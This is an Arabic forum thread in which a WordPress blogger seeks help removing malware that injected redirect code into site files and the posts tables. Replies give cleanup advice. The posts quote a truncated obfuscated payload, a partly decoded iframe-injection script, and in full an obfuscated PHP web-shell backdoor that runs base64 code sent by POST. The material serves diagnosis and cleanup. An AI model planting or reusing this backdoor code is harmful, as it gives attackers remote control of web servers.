تم تحسين هذا الموقع ليتم عرضه من متصفح حديث يتم فيه تمكين JavaScript.

قاعدة البيانات مصابة بشفرات و اكواد خبيثة "فيروس"

alfaisal

السلام عليكم
اقتحم فيروس المدونة و تم حجب الموقع من جوجل بعد انتشار اكواد خبيثة , وبعد التجارب لأيام اتضح ان الشفرات الخبيثة موجودة بقاعدة البيانات و هذا الذي تم التأكد منه .
تم رفع الحجب عن المدونة الأن بعد حذف الملفات و رفع ملفات نظيفة . ولكن الاكواد لازالت تظهر بلوحة تحكم المدونة عند الضغط على اي رابط بلوحة التحكم يظهر الرابط بأسفل الصفحة في شريط طلب الموقع و الأن روابط لوحة التحكم محجوبة من جوجل بسبب هذه الشفرات و التحذير يقول ان موقعنا محظور بسبب ارتباط بمواقع لها شبهات .
الروابط التي تظهر لــ .GabyLibien.com , و روابط اخرى جميعها محجوبة من جوجل

حاولت اغير قاعدة البيانات و اخذ نسخة عن التدوينات و لكن القاعدة الجديدة لم تكتشف ملف الصور لا يمكن ظهور الصور المحملة سابقا بها و بالاضافة الى فقدانا حسابات الاعضاء و لا اريد نقلها من القاعدة القديمة خوفا من تلوث القاعدة الجديدة
السؤال كيف يمكن تنظيف قاعدة البيانات من هذه الشفرات ؟ هل هناك حل

رشيد بيدوسي

نعم هناك حل. يجب أن تقوم بتحميل نسخة ووردبريس جديدة نظيفة ثم اهتم أن تقوم بتغيير كافة كلمات المرور. لا تستخدم اضافات قديمة غير محدثة أو قوالب قديمة.

بعدها قم بفحص قاعدة البيانات offline واحذف كافة الأكواد الخبيثة.

جرب تبحث في قاعدة البيانات عن eval و base64 فهي عادة تشير الى الاكواد الخبيثة. أيضا ابحث عن GabyLibien في قاعدة البيانات. لا توجد طريقة سهلة لتنظيف قاعدة البيانات، يجب أن تبحث بداخلها على مراحل حتى تجد هذه الأكواد.

alfaisal

شكرا اخي رشيد على الرد , منذ ردك و انا اقوم بمحاولة تنظيف قاعدة البيانات و لكن للأسف لم اتخلص من الأكواد , الخطوات التي قمت بها :
الخطوة الأولى : البحث عن eval و base64 : وجدت عدة اكواد حوالي سبع اكواد و تم حذفها و تم حذف الملفات و رفع ملفات نظيفة للووردبريس, لكن لا زالت الاكواد موجودة , بالنسبة لــ GabyLibien لم اجده .
الخطوة الثانية : حاولت اكتشاف اين توجد الشفرات من خلال بناء قاعدة جديدة و رفع الجدوال كل على حدى و للأسف وجدتها بجدول post و wp\_postmeta المخصص للمواضيع .
ثالث : حاولت من خلال تصدير و استيراد المواضيع من خلال المدونة و ظهرت الاكواد مرة اخرى .
سؤلي كيف يمكن تنظيف هذاالجدول , او كيف يمكن رفع الموضوعات بدون وحود الاكواد .
المشكلة ان الموقع تم حجبه مره اخرى بالكامل

nabil_kadimi

وعليكم السلام ورحمة الله،

أضف موضوعا جديدا ثم اعرضه في متصفحك، بعد ذلك أظهر شفرة (كود) الصفحة (CTRL+U) وافحصه وانظر هل تجد الأخطاء في هذا الموضوع الجديد.

هذا سيساعد على معرفة مكان الثغرة أو الاستغلال غير المرغوب، فقد يكون القرصان عدل تصرف إحدى الدوال بحيث تضيف شفراته في المقالات لحظة تسجيلها.

رشيد بيدوسي

\[quote id=5144\]سؤلي كيف يمكن تنظيف هذاالجدول , او كيف يمكن رفع الموضوعات بدون وحود الاكواد\[/quote\]

يدويًا.
مفضّل تحميل قاعدة البيانات على الجهاز وفتحها ببرنامج notepad++ ثم قم باجراء بحث CTRL+F، فقط بهذه الطريقة تستطيع أن تجد الأكواد وتزيلها.
لكن أهم من ذلك تأكّد أن الثغرة في الموقع لم تعد موجودة واذا ستسمر الأكواد الخبيثة في الظهور مرة أخرى من جديد.

alfaisal

بعد البحث المستمر توصلت الى أن الموقع مصاب بفيروس اسمه counter.php و هو فيروس يقوم بتوجيه المتصفح لموقع أخر , و لا يمكن اصتياد شفرة التوجيه من خلال البحث بسبب اكواد غريبة يتم وضعها , الى الأن لم اجد الحل , حتى المواقع المتخصصة لم تجد حل او الأسباب التي تسبب ذلك الفيروس و كيفية اقتحامه للمدونة , الفيروس يقوم بأنشاء ملف php بالدليل الرئيسي و بأسماء مختلفة !!!
بعض المدونات اقترحت البحث عن هذا الكود او شبيه له :

\#c3284d#
echo(gzinflate(base64\_decode(“VVHLboMwELxHyj/4ZlBTnhL0QSKlVQ899QOaChl7AU
vEduyFJP36Aomi9LizszOzu4XjVhrcLBcDs6Q8kDURmvd7UBhwCwzho4Op8qisLdsD9VfLRa
lGHnWAW0Qrqx6Bvo7o4btUP

في ملفات :
\*index.php
\*footer.php
\*function.php
\*header.php

المشكلة ان الموقع لا يقوم بأعادة توجيه و لكن جوجل تقول ان الموقع يقوم بأعادة توجيه , اعتقد ان عملية التوجيه تفشل و لكن الشفرة تجعل جوجل
تحجب الموقع .
هناك نصائح بتحميل اضافة Wordfence , قال بعضهم ان الأضافة اوقفت هذا الفيروس

بوغالية

عليكم السلام
قم بأزالة الكود من الصفحات المذكوره "اعتقد بأنك حاولت ولاكن لا أعلم ماكانت النتيجة"
وحسب الكود الذى وضعته
فهذا هو بعد فك التشفير
\[code\]
<script>var \_q = document.createElement('iframe'),\_n = 'setAttribute';\_q\[\_nee
\[/code\]

هل من الممكن ان تضع الكود كامل

alfaisal

مرحبا اخي بوغالية , بالحقيقة ليس لدي كود و الكود الذي قمت انا بوضعه بالتعليق هو ما اقترحه احدى الاشخاص للبحث عنه , لاني و عند قراءتي لمقال هذا الشخص قد قمت بالفعل سابقا بحذف جميع ملفات الموقع و اعادة تركيب ملفات نظيفة فلا جدوى من البحث عن الكود لاني قد قمت بحذف الملفات فعلا .
اعتقد ان فك التشفير الذي قمت بكتابته صحيح بشكل كبير و متطابق مع تحذير و تحليل ادوات مشرفي المواقع بجوجل مع فرق وجود وصلة لموقع يظهره تحليل جوجل .
المشكلة الان كيف يرجع هذا الفيروس و كيف يكون نفسه من جديد و كيف يقوم بانشاء ملف php , و السؤال الاهم كيف يمكن القضاء عليه نهائيا ؟
اتوقع للأسف ان الفيروس سيرجع مرة اخرى و حينها ساقوم بنشر الكود الكامل .

بوغالية

هل من الممكن ان ترسل لى رابط موقعك

alfaisal

شكرا اخي بو غالية على التفاعل , و اسف على تأخري بسبب انتظار عودة الفيروس , عاد من جديد و قام بأنشاء ملف php و يحمل الشفرة التالية:

<?php //cb6f82f3e4007bdaccf419abafab94c8
$\_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$\_\_ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$\_\_\_ = "\\x62\\141\\x73\\145\\x36\\64\\x5f\\144\\x65\\143\\x6f\\144\\x65";eval($\_\_\_($\_\_));

موقعي هو http://himanco.com